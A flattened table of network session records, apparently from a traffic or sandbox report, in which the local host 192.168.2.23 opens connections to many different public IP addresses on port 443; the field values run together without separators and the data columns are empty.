                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26773192.168.2.2360216113.234.17.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26774192.168.2.2359020156.12.173.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26775192.168.2.2334012112.103.70.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26776192.168.2.235720873.160.255.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26777192.168.2.2357398178.16.93.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26778192.168.2.2351302116.55.153.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26779192.168.2.2348752110.123.83.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26780192.168.2.2351776145.103.137.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26781192.168.2.2342944173.113.224.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26782192.168.2.2335122183.156.191.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26783192.168.2.2339080102.244.159.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26784192.168.2.234896697.218.171.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26785192.168.2.235773877.233.171.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26786192.168.2.235125240.59.81.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26787192.168.2.2336602112.174.24.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26788192.168.2.2333738132.70.138.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26789192.168.2.2337820113.215.184.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26790192.168.2.2352268213.197.20.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26791192.168.2.2340712191.100.229.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26792192.168.2.23390844.84.40.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26793192.168.2.2346586190.72.107.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26794192.168.2.234411254.71.116.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26795192.168.2.235339247.105.167.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26796192.168.2.2338170162.251.107.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26797192.168.2.2336062202.230.184.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26798192.168.2.235155091.44.11.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26799192.168.2.2354490185.138.141.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26800192.168.2.235961285.220.0.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26801192.168.2.2337512106.42.238.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26802192.168.2.2339546217.19.23.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26803192.168.2.2350996207.188.12.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26804192.168.2.2350818221.232.219.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26805192.168.2.235257034.93.2.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26806192.168.2.235252434.215.0.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26807192.168.2.233898461.65.127.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26808192.168.2.2358774187.249.233.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26809192.168.2.2334854132.7.3.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26810192.168.2.235362287.169.171.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26811192.168.2.234778227.60.72.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26812192.168.2.235151814.14.209.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26813192.168.2.2350306223.179.43.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26814192.168.2.234120259.107.35.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26815192.168.2.2335600212.220.251.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26816192.168.2.2341340198.237.93.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26817192.168.2.2360662179.187.135.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26818192.168.2.234274625.119.165.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26819192.168.2.233297481.169.245.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26820192.168.2.235009634.217.107.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26821192.168.2.23588969.44.109.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26822192.168.2.2350146125.130.70.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26823192.168.2.2335142202.71.51.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26824192.168.2.235658242.135.227.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26825192.168.2.2352536208.161.138.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26826192.168.2.234200494.27.255.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26827192.168.2.235619617.193.206.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26828192.168.2.233325252.254.69.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26829192.168.2.2340714137.1.223.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26830192.168.2.233775249.180.2.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26831192.168.2.234011212.139.14.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26832192.168.2.2353726128.82.8.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26833192.168.2.234922251.85.201.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26834192.168.2.2359496191.236.46.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26835192.168.2.2348592146.45.120.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26836192.168.2.2357964136.143.232.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26837192.168.2.2340506131.139.45.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26838192.168.2.2360510167.104.49.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26839192.168.2.2345472201.141.63.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26840192.168.2.236049260.6.134.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26841192.168.2.235462053.232.18.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26842192.168.2.2343934183.227.119.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26843192.168.2.2354702205.225.226.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26844192.168.2.234846668.76.87.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26845192.168.2.2347728184.153.212.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26846192.168.2.2340194122.20.16.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26847192.168.2.2346848125.53.225.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26848192.168.2.2348702196.169.97.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26849192.168.2.2340060209.204.213.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26850192.168.2.234611248.24.73.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26851192.168.2.234006442.172.191.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26852192.168.2.234673647.121.68.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26853192.168.2.2352812196.67.135.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26854192.168.2.2343842161.28.100.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26855192.168.2.235906887.223.167.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26856192.168.2.2360454116.58.218.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26857192.168.2.2340998211.61.233.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26858192.168.2.235136880.173.110.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26859192.168.2.2338370197.48.25.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26860192.168.2.2336116121.147.211.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26861192.168.2.2353552112.70.73.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26862192.168.2.2359544126.227.111.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26863192.168.2.236039261.141.135.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26864192.168.2.233626077.55.175.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26865192.168.2.2358300109.226.233.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26866192.168.2.2358982163.70.147.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26867192.168.2.2356584107.129.139.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26868192.168.2.2355930120.5.233.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26869192.168.2.234706813.49.23.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26870192.168.2.235049612.156.242.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26871192.168.2.2349760131.17.132.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26872192.168.2.2340708217.114.140.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26873192.168.2.2344290154.229.220.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26874192.168.2.23500189.15.36.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26875192.168.2.2360334101.0.30.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26876192.168.2.2344334193.35.230.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26877192.168.2.23547945.32.208.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26878192.168.2.2355946202.205.52.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26879192.168.2.2338274146.47.47.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26880192.168.2.2351054197.2.43.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26881192.168.2.2348006183.138.2.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26882192.168.2.2343646102.49.25.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26883192.168.2.2352604192.85.204.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26884192.168.2.2335094145.23.253.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26885192.168.2.2352076109.73.164.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26886192.168.2.2354162187.47.198.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26887192.168.2.235402247.244.135.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26888192.168.2.2354834168.251.119.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26889192.168.2.2346192213.41.227.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26890192.168.2.235409270.93.68.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26891192.168.2.2357986135.77.110.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26892192.168.2.235457858.224.151.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26893192.168.2.235935896.170.224.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26894192.168.2.234237240.58.113.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26895192.168.2.2350852135.103.219.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26896192.168.2.2353506177.118.198.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26897192.168.2.236062046.50.58.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26898192.168.2.233309447.251.20.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26899192.168.2.2340438106.119.24.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26900192.168.2.234588869.26.166.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26901192.168.2.2356232153.249.195.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26902192.168.2.235103884.243.22.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26903192.168.2.2347700213.95.109.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26904192.168.2.235781461.37.121.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26905192.168.2.23581404.178.219.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26906192.168.2.234086280.162.23.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26907192.168.2.2340440108.148.207.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26908192.168.2.2351786110.205.15.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26909192.168.2.233959071.158.79.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26910192.168.2.234960627.47.171.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26911192.168.2.234093669.16.21.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26912192.168.2.233468472.136.39.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26913192.168.2.234864214.209.115.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26914192.168.2.235255020.200.216.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26915192.168.2.235581083.189.88.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26916192.168.2.234773061.175.39.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26917192.168.2.2358700193.233.142.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26918192.168.2.2333782123.170.227.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26919192.168.2.235463861.120.180.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26920192.168.2.2341592169.204.164.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26921192.168.2.2345910112.114.201.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26922192.168.2.2347552192.117.141.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26923192.168.2.2342488110.80.53.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26924192.168.2.234852269.204.79.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26925192.168.2.236024632.60.198.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26926192.168.2.235252097.135.102.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26927192.168.2.2350426168.178.241.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26928192.168.2.234800088.202.205.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26929192.168.2.235780817.56.103.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26930192.168.2.2350560159.228.154.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26931192.168.2.233280669.111.77.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26932192.168.2.2354584198.190.98.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26933192.168.2.2349276200.202.196.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26934192.168.2.2356954157.50.221.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26935192.168.2.234248285.65.103.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26936192.168.2.2342912198.171.120.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26937192.168.2.2339184143.91.215.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26938192.168.2.2357164116.78.24.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26939192.168.2.2340348195.43.150.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26940192.168.2.235096088.23.98.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26941192.168.2.235777839.125.215.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26942192.168.2.234085288.52.209.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26943192.168.2.235321649.26.150.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26944192.168.2.2354744217.137.34.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26945192.168.2.2359880199.252.84.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26946192.168.2.235349042.247.19.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26947192.168.2.234044827.93.105.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26948192.168.2.234669692.155.244.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26949192.168.2.2360270131.195.242.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26950192.168.2.2333188185.51.129.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26951192.168.2.2345552199.130.57.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26952192.168.2.234553267.238.252.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26953192.168.2.2341534177.103.63.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26954192.168.2.234472827.205.196.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26955192.168.2.235901491.133.91.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26956192.168.2.234424888.251.44.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26957192.168.2.2352404169.53.137.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26958192.168.2.2338472167.124.212.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26959192.168.2.2339338109.115.179.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26960192.168.2.234968076.166.116.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26961192.168.2.2334240175.31.58.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26962192.168.2.234443671.194.161.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26963192.168.2.234708223.176.139.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26964192.168.2.2360152220.111.223.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26965192.168.2.2354440185.218.107.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26966192.168.2.2356830121.40.254.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26967192.168.2.2337526172.206.179.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26968192.168.2.2347756162.134.187.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26969192.168.2.234255839.115.250.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26970192.168.2.2355084218.248.224.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26971192.168.2.2333074119.73.22.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26972192.168.2.2345508221.209.168.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26973192.168.2.2355868192.255.196.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26974192.168.2.233679860.240.148.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26975192.168.2.234923427.52.161.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26976192.168.2.2337208149.86.73.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26977192.168.2.2350210138.133.50.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26978192.168.2.2348052217.220.10.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26979192.168.2.235373248.247.232.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26980192.168.2.233760848.23.192.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26981192.168.2.2359832121.179.142.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26982192.168.2.2344350182.2.167.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26983192.168.2.234395024.21.247.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26984192.168.2.234035264.1.6.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26985192.168.2.2355358129.24.65.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26986192.168.2.233980878.87.64.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26987192.168.2.2353454145.194.236.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26988192.168.2.2344872130.107.189.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26989192.168.2.2351150209.245.247.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26990192.168.2.2344740130.28.169.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26991192.168.2.234270087.124.66.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26992192.168.2.233533663.196.194.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26993192.168.2.235714272.222.195.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
